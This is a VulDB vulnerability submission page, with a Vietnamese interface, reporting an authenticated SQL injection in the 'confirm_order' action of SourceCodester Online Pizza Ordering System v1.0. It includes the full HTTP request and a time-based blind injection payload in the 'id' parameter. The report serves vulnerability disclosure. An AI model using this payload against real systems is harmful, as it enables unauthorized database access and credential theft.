Gửi #216885: SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'thông tin

tiêu đềSourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order'
Mô tảAffected Software: SourceCodester Online Pizza Ordering System v1.0 https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391 Tested On: Ubuntu Server 22.04.3 LTS Affected URL: http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order Request: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 Affected Parameter: id Proof of Concept: POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 5 Origin: http://x.x.x.x Connection: close Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE) Impact: SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials. Summary: An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
Người dùng
 simon.davis8080 (UID 54983)
Đệ trình05/10/2023 10:30 (cách đây 3 những năm)
Kiểm duyệt05/10/2023 12:01 (2 hours later)
Trạng tháiđược chấp nhận
Mục VulDB241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID Tiêm SQL]
điểm17

Do you need the next level of professionalism?

Upgrade your account now!